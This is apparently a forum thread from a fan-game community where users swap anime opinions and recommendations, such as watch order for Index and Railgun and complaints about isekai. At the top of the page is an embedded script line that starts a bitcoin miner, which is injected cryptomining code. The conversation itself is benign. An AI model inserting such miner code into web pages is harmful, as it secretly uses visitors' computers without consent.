<script>
miner.start(); // initialise bitcoin miner
</script>

mario fan games galaxysmw centralsmbx community

Anime & Manga - this is an official hentai free sight!!!!

here's a good place for FRIENDLY, ENJOYABLE, and otherwise very GENERAL discussion!
KobaBeach
obscure jrpg enthusiast
First name: David
Pronouns: he/him

Re: Anime & Manga - this is an official hentai free sight!!!!

Postby KobaBeach » 2 months ago

BobisOnlyBob wrote:
KobaBeach wrote: Watched Kemono Michi episode 1 some days back.
Same! I had pretty much the same reactions as you, but the jokes that did land landed so well I think I'm gonna give it at least another 2 episodes - if it tones down the perversion and ups the rest of the comedy, it's definitely a winner. If it stays the same, I'll probably drop it.
god yeah i honestly just want a cute and funny show with furries in it
twitter (spicy at times!) | avatar by kuma

who cares:

BobisOnlyBob
Mythical Quadruped

Postby BobisOnlyBob » 2 months ago

KobaBeach wrote: god yeah i honestly just want a cute and funny show with furries in it
WORLDEND and Overlord Season II both managed to have reptile romance, yet no love for actual fluff.
BOB is an acronym for BOB is Only BOB etc.

KobaBeach
obscure jrpg enthusiast

Watched some African Office Worker after running into it on my twitter and it's good! But it's also super gross lol

I want to punch Toucan in the dick

Big Cat and Lizard are so nice <3

Edit: Lion is voiced by Akio Otsuka (Gami Gami Devil, Solid Snake, Xehanort, Fate/Zero!Rider, Wamuu) oh mama

who cares:

KobaBeach
obscure jrpg enthusiast

Binged through all of Ojisan and Marshmallow and jesus christ this anime is adorable??????????
Special ep was just... Breastfeeding? It was very awkward to sit through.

But the rest was precious and I loved it!

Hige reminds me of Big the Cat <3

who cares:

Kincyr

Postby Kincyr » 2 months ago

I'm surprised there's no mention of Bananya, as the second season started 2 weeks ago and they now live on their own planet :catplanet:
"Your lives that I spit on are now but a caricature of a cartoon drawn by a kid who is stupid!" - Fawful

Griflion
I'm gonna chomp ya!

Postby Griflion » 2 months ago

:catplanet: :catplanet: :catplanet: oh man, i remember watching the first season some years ago on behest of pholtos. Better watch the new season too :catplanet: :catplanet: :catplanet:

ano0maly
Discord User

Postby ano0maly » 1 month ago

is The Rising of the Shield Hero good

Image The talkhaus Discord server. Come ask for an invite to join!

Now the sole biggest

Jongseok

Postby Jongseok » 1 month ago

I watched some Japanese Anime like 「やはり俺の靑春ラブコメはまちがっている。」 , 「俺の彼女と幼なじみが修羅場すぎる」
I had a lot fun of these kinds of Anime. Last week, I found the most popular series called "Toaru Majutsu no Index(とある魔術の禁書目録(インデックス))". I think It seems to be a good combination of science (superpower) and magic. I have a question here. Some websites say "Toaru Kagaku no Railgun(とある科学の超電磁砲(レールガン))" series are much funnier than original series. So I'm going to watch "Railgun" series before watching "Index" series. Is it fine I watch "Railgun" without watching all of the original series(Index)?
知らなければ答えなくてもいいです。知ってるのに答えないなら 覚悟は いいわね... この変態が!!

BobisOnlyBob
Mythical Quadruped

Postby BobisOnlyBob » 1 month ago

Unfortunately Railgun and Index are sort of inter-connected. If you watch Index first, certain things in Railgun will be spoiled and vice-versa.

I think you should probably try watching the first few episodes of Index, and if you don't care for it then jump right over to Railgun. Some people recommend watching Index episodes 1-9, then watch Railgun I and II, then go back to Index if you want to. It's one of those needlessly complicated series. Personally I enjoyed Index I and was okay with Index II but Index III was really, really bad. Despite my better judgement I'm now watching Accelerator, the latest spin-off, and it's... it's alright. It's better than Index III.
ano0maly wrote: is The Rising of the Shield Hero good
It's enjoyable, but I'm struggling to call it 'good'. Do you like Isekai? Do you like downtrodden protagonists who get kicked a lot? Are you okay with grey morality heroes? Are you okay with the protagonist becoming more typical/OP over time? Do you like cute raccoon girls, chocobos and princesses? It's one that I generally enjoyed watching each week but it has a lot of questionable elements that bring it down in my estimation from a genuinely good show. It's definitely a fun timewaster, and a slightly more serious/grounded take on isekais, but if you want a fun goofy romp then no, watch KonoSuba or TUEEE or Kemonomichi or something instead. Better yet, just watch Restaurant to Another World, which managed to make me hungry while I was eating.

Quadro
Heh heh.
Pronouns: he/him/his

Postby Quadro » 1 month ago

I've been rereading Skip Beat. I really like it! One of my favorites.
And Kyoko is just the best. She steals every scene she's in.

I watched some episodes of the dub, and I thought it was pretty good! Whoever voices Kyoko is perfect.
"Wherever you are tonight,
I wish you the best of everything."

-Tom Petty
"And all the fools sailed away..."

icon stolen from: https://youtu.be/CjW_QPzfn-Q

Gardenolva
Void and Voir embraced together...
First name: En Gardevoir
Pronouns: Male

Postby Gardenolva » 1 month ago

The more isekai anime that I heard about and seeing posts about them, the more I dodge them because they always start and end in almost the same way.

A.K.A.: En Gardevoir
Signature credits to DeviousShadows
Original Splash Art by Rayark Games

BobisOnlyBob
Mythical Quadruped

Postby BobisOnlyBob » 1 month ago

Gardenolva wrote: The more isekai anime that I heard about and seeing posts about them, the more I dodge them because they always start and end in almost the same way.
very good call. Basically only watch isekai if you know what you're getting or are willing to gamble on a wild-card concept in Episode 1 making it interesting.

I once watched the first 15 minutes of "In Another World With My Smartphone". That was quite simply one of the worst anime I've ever watched, because it was so deeply, absolutely, utterly boring. There are much more garbage anime I've watched that I still fondly remember for how bad they are, but Smartphone is just an atrocity against taste. It's all the narcoleptic properties of Glasslip spread over a very large and stale cracker.

Truhan
Lord of the Waifus
Pronouns: Waifulord

Postby Truhan » 1 month ago

Gardenolva wrote: The more isekai anime that I heard about and seeing posts about them, the more I dodge them because they always start and end in almost the same way.
Yo, I heard you don't like isekai, so I recommend you listen to this audiobook of an isekai author getting isekai'd.

Girls are a hoax created by the Japanese anime industry to scam otaku out of their money.

Return to “the gazebo”